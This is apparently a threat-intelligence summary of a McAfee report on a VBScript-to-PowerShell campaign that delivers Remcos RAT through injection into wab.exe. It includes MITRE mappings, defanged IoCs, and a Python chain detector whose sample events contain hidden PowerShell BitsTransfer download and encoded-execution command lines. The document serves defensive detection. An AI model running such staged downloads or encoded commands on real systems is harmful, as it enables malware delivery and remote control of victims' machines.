McAfee Labs describes a sophisticated VBScript-driven campaign that began with AgentTesla and now distributes Remcos RAT along with other malware like Guloader, Xworm, and Lokibot. The attack chain uses obfuscated VBS, staged PowerShell, reflective shellcode loading, and a wab.exe host to execute the final Remcos payload; it targets users worldwide. #AgentTesla #RemcosRAT #Guloader #Xworm #Lokibot
Key points
- The initial stage is a heavily obfuscated VBScript delivered as an email attachment.
- The infection progresses from the VBS file through staged PowerShell phases, with BitsTransfer fetching a second-stage script.
- The second-stage PowerShell is base64-encoded; once decoded, it loads and executes multiple shellcodes reflectively.
- Final payload (Remcos RAT) is downloaded and injected into wab.exe, enabling remote control and data collection.
- Shellcode loading involves decryption loops, memory writes, and process injection techniques intended to evade detection.
- The campaign has global reach, as shown by a geo heatmap of targeted McAfee customers over three months.
MITRE Techniques
- [T1059.005] VBScript – The campaign begins with a heavily obfuscated VBS file attached in email. ‘Attached to the email is a ZIP file seemingly labeled as “revised_quotation_for_purchase_invoice_order_design_6th_november_2023”, resembling an invoice to the user.’
- [T1059.001] PowerShell – Execution moves from the VBS to first-stage PowerShell and then to a second-stage PowerShell. ‘The execution begins by running a VBS script. Then it triggers the execution of the first-stage PowerShell. Subsequently, the BitsTransfer utility is employed to fetch a second-stage PowerShell which is base64 encoded.’
- [T1105] Ingress Tool Transfer – BitsTransfer is used to fetch the second-stage PowerShell. ‘Retrieves the second-level file from “hxxp://103.176.111[.]163/mundhul.pfb” using BitsTransfer.’
- [T1140] Deobfuscation/Decode Data – The script deobfuscates and decodes embedded data to reveal the final payload. ‘After deobfuscating the code’ and ‘the entire script is decoded…’
- [T1055] Process Injection – Shellcode B is injected into wab.exe to execute the final payload. ‘The shellcode is designed to establish a new process named “wab.exe” and it replicates 0x3FC4000 bytes of decrypted shellcode into its memory space. … subsequently injected into the wab.exe process’
- [T1095] Non-Application Layer Protocol – C2 communication with an external IP address and port. ‘connects to the IP address 94.156.65.197 through port 2404.’
- [T1056.001] Keylogging – Keystrokes are captured and stored. ‘Data keylogged during its operation is stored in a file labeled “logs.dat.”’
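The chain above (script host spawning PowerShell, a BitsTransfer download, a base64-encoded second stage, and wab.exe started by PowerShell) can be turned into a chain-aware detection. The following is an added example, not McAfee's code; it runs over constructed Sysmon-style process-creation records, and all PIDs, paths and command lines are illustrative.

```python
"""Detect the VBS -> PowerShell -> wab.exe chain in process-creation events."""
import re

# Constructed sample events (hypothetical PIDs, paths, command lines).
EVENTS = [
    {"pid": 4100, "ppid": 3020, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\u\Downloads\revised_quotation.vbs"'},
    {"pid": 4188, "ppid": 4100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden Import-Module BitsTransfer; Start-BitsTransfer -Source hxxp://[placeholder]/stage2 -Destination $env:TEMP\\s2"},
    {"pid": 4210, "ppid": 4188, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -ep bypass -e SQBtAHAAbwByAHQALQBNAG8AZAB1AGwAZQA="},
    {"pid": 4300, "ppid": 4210, "image": r"C:\Program Files\Windows Mail\wab.exe",
     "cmdline": "wab.exe"},
    {"pid": 5000, "ppid": 1200, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Command-line markers for the staging behaviour described in the report.
STAGING = [
    ("bits_download", re.compile(r"Start-BitsTransfer|Import-Module\s+BitsTransfer", re.I)),
    ("encoded_command", re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s|FromBase64String", re.I)),
]

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def detect(events):
    """Return (rule, pid) findings; parent lineage is resolved from the same batch."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        pname = basename(parent["image"]) if parent else ""
        if name == "powershell.exe" and pname in SCRIPT_HOSTS:
            findings.append(("vbs_spawns_powershell", e["pid"]))
        if name == "powershell.exe":
            for label, rx in STAGING:
                if rx.search(e["cmdline"]):
                    findings.append((label, e["pid"]))
        # wab.exe is a mail/contacts helper; PowerShell as its parent is anomalous.
        if name == "wab.exe" and pname == "powershell.exe":
            findings.append(("wab_spawned_by_powershell", e["pid"]))
    return findings

def chain_alert(findings):
    """High-confidence alert only when both ends of the chain are observed."""
    rules = {r for r, _ in findings}
    return {"vbs_spawns_powershell", "wab_spawned_by_powershell"} <= rules
```

Individual rules fire often on legitimate admin activity; the combined chain_alert is what should page an analyst.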
Indicators of Compromise
- [File hash] VBS/Final payload – 6fdd246520eebb59e37a7cd544477567b405a11e118b7754ff0d4a89c01251e4, and 7d947df412e78a595029121ecaf9d8a88e69175cffd1f2d75d31e3ca8995c978
- [URL] Command and control/download locations – hxxp://103.176.111[.]163/mundhul.pfb, hxxp://103.176.111[.]163/lnHxQotdQb132.bin
- [IP address] Command-and-control destinations – 103.176.111[.]163, 94.156.65[.]197
- [Mutex] Single-instance or synchronization – Rmc-R7V4VM